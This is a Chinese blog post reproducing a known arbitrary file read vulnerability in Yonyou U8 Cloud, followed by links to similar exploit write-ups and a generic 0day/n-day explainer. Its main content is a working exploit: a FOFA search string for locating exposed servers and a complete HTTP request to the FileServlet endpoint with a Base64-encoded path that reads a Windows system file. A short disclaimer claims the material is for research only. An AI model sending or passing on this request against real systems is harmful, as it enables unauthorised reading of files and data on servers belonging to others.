【漏洞复现】(Nday)用友U8 Cloud 任意文件读取漏洞复现

最新推荐文章于 2024-10-12 23:14:09 发布
原创 最新推荐文章于 2024-10-12 23:14:09 发布 · 639 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络安全

本文介绍了Aniya网络安全实验室关于用友-U8-Cloud的一个漏洞POC示例,涉及路径Base64编码,同时强调了文章仅供研究学习,使用者需自行承担后果。

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01:FOFA语句

app="用友-U8-Cloud"

0x02:漏洞POC

对路径进行Base64编码

GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
Host: IP/HOSt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

直接发包测试

用友U8 Cloud 反序列化RCE漏洞复现
0xSec
11-08 5813
用友U8Cloud存在多处(FileManageServlet和LoginVideoServlet)反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,结合系统本身存在的反序列化利用链,最终造成远程代码执行。
nday】Halo任意文件读取漏洞
信安是不可或缺的一部分!
07-24 1168
官网:https://halo.run/这个漏洞属于未公开漏洞,影响的范围没有完全确定,可以自行测试自己的服务器是否存在,存在则升级版本或者使用docker容器更加安全
nday用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞复现
伏一
05-22 485
"用友 U8 OA"
Nday】Spring-Cloud-SpEL-RCE漏洞复现
wwang135的博客
03-30 4625
Spring-Cloud-SpEL-RCE漏洞复现
Flink任意文件读写漏洞复现及排查
dayouzi的博客
08-14 487
Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行。Apache Flink的数据流编程模型在有限和无限数据集上提供单次事件(event-at-a-time)处理。在基础层面,Flink程序由流和转换组成。
漏洞分析 | U8 Cloud ServiceDispatcher反序列化漏洞及补丁分析
m0_46699477的博客
11-04 3336
本文对 U8Cloud ServiceDispatcher 接口反序列化漏洞原理进行跟踪分析,讲述了该漏洞是如何被利用以及官方的修复方式。
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)1
08-03
在本文中,我们将深入探讨KiteCMS的安全漏洞,特别是关于任意文件写入、任意文件读取和反序列化的风险。KiteCMS是一个基于ThinkPHP5.1框架构建的内容管理系统(CMS)。由于其代码中存在的一些设计缺陷,攻击者可能...
深信服应用交付报表系统任意文件读取漏洞复现
薛定谔嘚喵博客
09-07 956
SINFOR AD是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。深信服应用交付报表系统存在任意文件读取漏洞,攻击者利用漏洞读取设备中的指定路径文件
Hoverfly 任意文件读取漏洞(CVE-2024-45388)
蚁景网安学院
10-12 1544
Hoverfly 是一个为开发人员和测试人员提供的轻量级服务虚拟化/API模拟/API模拟工具。其 /api/v2/simulation​ 的 POST 处理程序允许用户从用户指定的文件内容中创建新的模拟视图。然而,这一功能可能被攻击者利用来读取 Hoverfly 服务器上的任意文件
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)_用友u8-cloud fileservlet接口存在任意文件读取漏洞
m0_60229361的博客
04-16 1093
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
漏洞复现--用友U8-cloud RegisterServlet SQL注入
qq_53003652的博客
11-14 1300
U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品RegisterServlet处存在SQL注入。访问/servlet/RegisterServlet。如上页面即可能存在漏洞用友U8-Cloud
漏洞复现用友U8-Cloud XChangeServlet XXE漏洞
qq_67810151的博客
05-11 918
用友U8 cloud /service/XChangeServlet接口存在XXE漏洞,未授权的攻击者可通过此漏洞获取数据库敏感信息,从而盗取服务器数据,造成服务器信息泄露。
【高危】用友 U8 Cloud、GRP-U8、A++V8.31存在多个高危漏洞
murphysec的博客
06-07 2415
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。用友 GRP-U8 存在3个高危漏洞,分别为forgetPassword_old.jsp SQL注入漏洞、XML实体注入漏洞、XXNode SQL注入漏洞用友@[GRP-U8, GRP-U8]
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
qq_42067124的博客
12-28 884
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
Nday--CVE-2020-16898(TCP/IP远程代码执行漏洞)
Vdieoo的博客
11-18 670
CVE-2020-16898 TCP/IP远程代码执行漏洞 https://github.com/XTaiQue/CVE-2020-16898--EXP-POC poc ,exp 完整学习:https://www.freebuf.com/articles/system/252263.html 以下我的复现过程:
若依nday复现
shihui的博客
09-17 1001
漏洞点:后台 com/ruoyi/generator/controller/GenController 下的/tool/gen/createTable路由存在sql注入。漏洞点:系统工具–>代码生成–>导入–>用户和角色关联表—>修改->模版选择数表,其余的都选择用户ID,点击保存。下载:https://gitee.com/y_project/RuoYi。默认账号密码:admin/admin123 或 ry/admin123。可知/demo/form/localrefresh/task 存在漏洞
NUUO 网络摄像头命令执行漏洞
weixin_45971758的博客
02-06 2396
NUUO是中国台湾省NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。网络视频记录器的CPU为Marvell Kirkwood 88F6281,CPU架构为基于ARMv5架构。该系统中有busybox,一个精简的环境,包含了许多最常用的UNIX命令和工具,如ls、cp、mv、grep、find、awk、sed等。无法执行复杂的任务和其他架构的程序。
用友U8 cloud servicedispatcher 反序列化漏洞(含批量验证poc)
weixin_43567873的博客
04-28 2986
用友U8 cloud servicedispatcher 反序列化漏洞(含批量验证poc)
网络安全笔记整理
qq_64395221的博客
01-22 1131
中了木马”就是指安装了木马的服务器程序,若你的电脑被安装了服务器程序,则拥有控制器程序的人就可以通过网络控制装有服务器程序的电脑。特点:可控制的网络,这个网络并不是指物理意义上具有拓扑结构的网络,它具有一定的分布性,随着bot程序的不断传播而不断有新位置的僵尸计算机添加到这个网络中来,可以一对多地执行相同的恶意行为。流氓软件是指在未明确提示用户或未经用户许可的情况下,在用户计算机或其他终端上安装运行,侵害用户合法权益的软件,但不包含中国法律法规规定的计算机病毒。的方式欺骗操作系统。
0day漏洞Nday
最新发布
01-07
### 0day漏洞Nday漏洞的区别 #### 定义差异 0day漏洞指的是尚未公开且未有补丁的安全缺陷,这类漏洞仅被少数人知晓,在官方发布修复方案前处于隐蔽状态[^2]。而Nday漏洞则是指那些已被公布,并存在已知解决方案或补丁的漏洞,意味着这些漏洞的信息透明度较高,社区和厂商已有相应的防护手段[^1]。 #### 特点对比 - **隐秘性** 对于0day漏洞而言,由于其未知特性,使得攻击者可以在不被察觉的情况下实施攻击;相比之下,Nday漏洞因信息公开,防御方可以提前部署防范措施[^3]。 - **生命周期** 0day漏洞一旦被披露便迅速转变为Nday漏洞,此时安全团队能够及时响应并提供更新来修补该问题。然而,在成为公众知识之前的时间窗口内,0day漏洞对目标系统构成潜在威胁。 - **影响范围** 新近发现的0day漏洞可能针对特定软件版本或配置环境造成严重影响,而随着时间推移变成Nday之后,则更多依赖于用户的升级情况决定实际受影响程度。 #### 安全应对策略 面对这两种类型的漏洞,采取不同的预防机制至关重要: - 对于0day漏洞,建议保持警惕的态度,定期关注行业动态和技术论坛上的最新消息,以便尽早识别潜在风险。同时加强内部网络安全监测能力,通过入侵检测系统(IDS)/入侵防御系统(IPS)等工具捕捉异常活动迹象。 - 针对Nday漏洞,应建立快速反应流程,确保能够在第一时间获取到最新的安全公告以及对应的修复包。此外,还应该制定详细的应急预案,当遇到无法即时打上补丁的情况时,可以通过临时性的缓解方法减少暴露面,比如调整防火墙规则、关闭不必要的服务端口等方式降低受攻击的可能性。 ```python def check_vulnerability(vuln_type): """ 检查是否存在指定类型的漏洞 参数: vuln_type (str): '0day' 或 'nday' 返回: bool: 如果存在返回True, 否则False """ if vuln_type == "0day": # 实现针对0day漏洞的特殊检查逻辑 pass elif vuln_type == "nday": # 使用常规扫描工具查找已知漏洞 pass ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值